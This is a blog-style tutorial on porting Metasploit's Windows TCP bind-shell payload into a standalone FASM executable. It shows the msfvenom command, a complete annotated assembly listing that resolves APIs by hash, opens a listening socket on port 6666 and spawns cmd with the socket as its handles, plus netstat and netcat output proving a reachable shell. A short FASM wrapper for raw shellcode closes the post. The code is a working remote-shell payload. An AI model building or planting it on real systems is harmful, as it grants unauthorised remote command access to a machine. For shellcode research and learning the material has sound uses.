Intro

During the last couple of weeks I started focusing more and more on Windows internals and the way shellcode is crafted for the different Windows platforms. There are many good Windows shellcode examples up for grabs on the internet, but some of them are written in MASM and others do not care much about keeping a small memory footprint. Hence, I decided to focus on what is probably the best actively maintained shellcode repository: msfvenom.
We can then dump the raw assembly from msfvenom shellcode and try porting it to a standard assembler, such as FASM.

Why FASM?

  1. Has no linker –> just a single building step
  2. So it builds faster
  3. Maintained by an active community
  4. It’s cross platform.

Pick your shellcode

I have opted for the simplest TCP bind shell available in msfvenom. By redirecting the raw format to stdout we can then pipe it into ndisasm to dump the x86 assembly dead listing.

# msfvenom -p windows/shell_bind_tcp LPORT=6666 -f raw | ndisasm -u -
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 328 bytes

00000000  FC                cld
00000001  E882000000        call 0x88
00000006  60                pusha
[...snip...]
00000143  6A00              push byte +0x0
00000145  53                push ebx
00000146  FFD5              call ebp

The -u flag tells ndisasm to expect 32-bit mode assembly, while the trailing - makes it read from stdin instead of a file.

From deadlisting to a standalone FASM

With a few syntax modifications we could just assemble the raw ndisasm listing into a raw binary, but why not build a standalone PE that can easily be run and tested with a debugger?

First, we need to translate the following syntax and constructs.

Examples:

ndisasm:                   FASM:
-----------------          -----------------
push byte +0x8             push 0x8
jl 0x143                   jl sub6   ; label 'sub6'  created at offset 0x143
loop 0x1e                  loop loop1; label 'loop1' created at offset 0x1e
call 0x88                  call first; label 'first' created at offset 0x88

The bottom line is that we should remove every hardcoded relative address and replace it with a label.

Finally, we need a proper header, so that the assembler will generate a proper PE with all the bells and whistles.

format PE console ; emit a Windows PE executable for the console subsystem
use32             ; assemble the code that follows as 32-bit

Time to test

Here is the resulting shellcode, after all the syntax translations and labelling:

; FASM output settings for the standalone test executable.
format PE console ; build a console-subsystem PE
use32             ; 32-bit code
entry start       ; execution begins at the 'start' label

; Entry point followed by the hash-based API resolver.
;
; 'call first' pushes the address of the next instruction (the pusha below)
; and 'first' pops it into ebp. From then on the payload reaches the resolver
; with:   push <args...> / push <32-bit hash> / call ebp
;
; Resolver contract, as visible in this code:
;   in  : [esp]   = return address
;         [esp+4] = hash identifying the wanted export
;         [esp+8] onwards = arguments for that export
;   out : jumps to the resolved export with the hash removed from the stack,
;         so the export sees a normal "return address + arguments" frame.
;   General-purpose registers are restored by popa, except eax (target
;   address), ecx (return address) and edx (the hash).
;
; NOTE(review): the ndisasm dump starts with 'cld' before the call; this port
; omits it, so the lodsb loops rely on the direction flag already being clear.
start:
call first                     ; ebp (set in 'first') = address of the pusha below
pusha                          ; save all eight registers (0x20 bytes)
mov ebp,esp                    ; frame base: [ebp+0x20] = return address, [ebp+0x24] = requested hash
xor eax,eax                    ; eax = 0; lodsb only writes al, so ah and the upper half stay 0
mov edx,[fs:eax+0x30]          ; presumably the PEB pointer (x86 Windows TEB layout) - verify
mov edx,[edx+0xc]              ; presumably PEB->Ldr
mov edx,[edx+0x14]             ; presumably the first entry of the loaded-module list
sub5:
    ; ---- per module: hash its name ----
    mov esi,[edx+0x28]         ; pointer to the name buffer of this list entry
    movzx ecx,word [edx+0x26]  ; byte count used as loop counter (presumably the name's MaximumLength)
    xor edi,edi                ; edi = running module-name hash
loop1: lodsb                   ; al = next byte of the name
    cmp al,0x61                ; below 'a'?
    jl sub7                    ; yes: use the byte unchanged
    sub al,0x20                ; no: subtract 0x20 (lowercase -> uppercase)
sub7:
    ror edi,byte 0xd           ; hash = ror(hash, 13) + byte
    add edi,eax
loop loop1
push edx                       ; [ebp-0x4] = current module list entry
push edi                       ; [ebp-0x8] = module-name hash
mov edx,[edx+0x10]             ; presumably the module base address
mov ecx,[edx+0x3c]             ; presumably e_lfanew (offset of the PE header)
mov ecx,[ecx+edx+0x78]         ; presumably the export directory RVA
jecxz sub1                     ; zero: nothing to search in this module, go to the next one
add ecx,edx                    ; ecx = address of the export directory
push ecx                       ; keep it for the match path below
mov ebx,[ecx+0x20]             ; table of name RVAs ...
add ebx,edx                    ; ... converted to an address
mov ecx,[ecx+0x18]             ; number of entries to scan
sub4:
    ; ---- per export name, walking the table backwards ----
    jecxz sub2                 ; no names left: try the next module
    dec ecx
    mov esi,[ebx+ecx*4]        ; RVA of the ecx-th name
    add esi,edx                ; esi = pointer to the name string
    xor edi,edi                ; edi = running function-name hash
sub3:
    lodsb
    ror edi,byte 0xd           ; same ror-13/add hash as above, without the case folding
    add edi,eax
    cmp al,ah                  ; ah is 0, so this stops after the terminating NUL was hashed
    jnz sub3
    add edi,[ebp-0x8]          ; combine with the module-name hash
    cmp edi,[ebp+0x24]         ; equal to the hash the caller pushed?
    jnz sub4                   ; no: next name
    ; ---- match: translate name index -> ordinal -> address ----
    pop eax                    ; eax = export directory (pushed above)
    mov ebx,[eax+0x24]         ; ordinal table RVA
    add ebx,edx
    mov cx,[ebx+ecx*2]         ; cx = ordinal belonging to the matched name
    mov ebx,[eax+0x1c]         ; address table RVA
    add ebx,edx
    mov eax,[ebx+ecx*4]        ; RVA of the function
    add eax,edx                ; eax = absolute function address
    mov [esp+0x24],eax         ; overwrite the eax slot of the pusha frame so popa returns it
    pop ebx                    ; discard the module-name hash
    pop ebx                    ; discard the module list entry
    popa                       ; restore registers; eax = function address
    pop ecx                    ; ecx = caller's return address
    pop edx                    ; drop the hash argument
    push ecx                   ; put the return address back on top
    jmp eax                    ; tail-jump: the function returns straight to the caller
sub2:
    pop edi                    ; discard the saved export directory pointer
sub1:
    pop edi                    ; discard the module-name hash
    pop edx                    ; edx = current module list entry
    mov edx,[edx]              ; follow its first dword to the next entry
    jmp short sub5

; Payload body. Every API is reached as: push <args> / push <hash> / call ebp,
; where ebp holds the resolver address popped below.
; NOTE(review): the API names in the comments are not visible in this file;
; they are inferred from the argument patterns and from the payload being
; msfvenom's windows/shell_bind_tcp. Confirm against the Metasploit sources.
first: pop ebp                 ; ebp = return address of the initial call = resolver entry
    push dword 0x3233          ; bytes "32\0\0"
    push dword 0x5f327377      ; bytes "ws2_" -> the stack now holds the string "ws2_32"
    push esp                   ; argument: pointer to that string
    push dword 0x726774c       ; hash, presumably LoadLibraryA
    call ebp
    mov eax,0x190
    sub esp,eax                ; reserve 0x190 bytes of stack as an output buffer
    push esp                   ; argument: pointer to the buffer
    push eax                   ; argument: 0x190
    push dword 0x6b8029        ; hash, presumably WSAStartup
    call ebp
    push 0x8
    pop ecx                    ; ecx = 8

 loop2:
    push eax                   ; push the previous call's return value 8 times
    loop loop2                 ; (presumably 0 on success, giving zeroed argument slots)

    inc eax
    push eax                   ; eax + 1 (presumably 1 = SOCK_STREAM)
    inc eax
    push eax                   ; eax + 2 (presumably 2 = AF_INET)
    push dword 0xe0df0fea      ; hash, presumably WSASocketA; other args come from the dwords above
    call ebp
    xchg eax,edi               ; edi = returned value (the listening socket)
    push dword 0xa1a0002       ; bytes in memory 02 00 1a 0a: family 2 (AF_INET), port 0x1a0a = 6666 in network byte order
    mov esi,esp                ; esi = pointer to the address structure; the following dwords were pushed by loop2
    push 0x10                  ; argument: structure length, 16 bytes
    push esi                   ; argument: pointer to the structure
    push edi                   ; argument: socket
    push dword 0x6737dbc2      ; hash, presumably bind
    call ebp
    push edi                   ; argument: socket; any further argument is whatever is already on the stack
    push dword 0xff38e9b7      ; hash, presumably listen
    call ebp
    push edi                   ; argument: socket; remaining arguments again come from the stack
    push dword 0xe13bec74      ; hash, presumably accept
    call ebp
    push edi                   ; argument: the listening socket
    xchg eax,edi               ; edi = value returned by the previous call (the connected socket)
    push dword 0x614d6e75      ; hash, presumably closesocket
    call ebp
    push dword 0x646d63        ; bytes "cmd\0"
    mov ebx,esp                ; ebx = pointer to the string "cmd"
    push edi                   ; three copies of the connected socket
    push edi                   ; (presumably the std error/output/input handle fields
    push edi                   ;  of a STARTUPINFO structure built on the stack)
    xor esi,esi                ; esi = 0
    push 0x12
    pop ecx                    ; ecx = 18
loop3:
    push esi                   ; push 18 zero dwords (0x48 bytes)
    loop loop3
    mov word [esp+0x3c],0x101  ; presumably STARTUPINFO.dwFlags (0x101) - verify offset
    lea eax,[esp+0x10]         ; eax = start of the structure; the 16 bytes below it stay zero
    mov byte [eax],0x44        ; first field = 0x44 (68), presumably the structure size 'cb'
    push esp                   ; argument: pointer to the 16 zero bytes (presumably PROCESS_INFORMATION out)
    push eax                   ; argument: pointer to the structure
    push esi                   ; argument: 0
    push esi                   ; argument: 0
    push esi                   ; argument: 0
    inc esi
    push esi                   ; argument: 1 (presumably bInheritHandles = TRUE)
    dec esi
    push esi                   ; argument: 0
    push esi                   ; argument: 0
    push ebx                   ; argument: pointer to "cmd"
    push esi                   ; argument: 0
    push dword 0x863fcc79      ; hash, presumably CreateProcessA (10 arguments pushed above)
    call ebp
    mov eax,esp                ; eax = pointer to the current stack top
    dec esi                    ; esi = 0xFFFFFFFF
    push esi                   ; argument: 0xFFFFFFFF (presumably an INFINITE timeout)
    inc esi                    ; esi back to 0
    push dword [eax]           ; argument: first dword at the old stack top (presumably the process handle)
    push dword 0x601d8708      ; hash, presumably WaitForSingleObject
    call ebp
    mov ebx,0x56a2b5f0         ; default exit-function hash, presumably ExitProcess
    push dword 0x9dbd95a6      ; hash, presumably GetVersion
    call ebp
    cmp al,0x6                 ; low byte of the result below 6?
    jl sub6                    ; yes: keep the default exit hash
    cmp bl,0xe0                ; bl is 0xf0 here if ebx survived the call, so the jnz is taken
    jnz sub6
    mov ebx,0x6f721347         ; alternative exit hash, only reached when bl == 0xe0
sub6:
    push 0x0                   ; argument: 0 (presumably the exit code)
    push ebx                   ; hash of the chosen exit function
    call ebp                   ; no code follows, so this call is presumably expected not to return

We can now compile and run it, and verify that we have a listening port.

C:\Windows\system32>netstat -ano | find "6666"
  TCP    0.0.0.0:6666           0.0.0.0:0              LISTENING       6796

And a reachable shell

matteo-mbp:~ matteo$ nc 172.16.165.220 6666
Microsoft Windows [Version 10.0.18362.113]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\matteo\Desktop>

As my great colleague Stian Jahr pointed out, there is a simpler way to achieve all of the above, with just a short FASM script :)

; Wraps a prebuilt raw payload file in an executable instead of porting the listing by hand.
include 'win32ax.inc' ; you can simply switch between win32ax, win32wx, win64ax and win64wx here
.code
  start:
       ; 'file' copies the bytes of shellcode.bin verbatim at this position,
       ; i.e. directly at the 'start' label that '.end start' names as entry point
       file "shellcode.bin" ;
.end start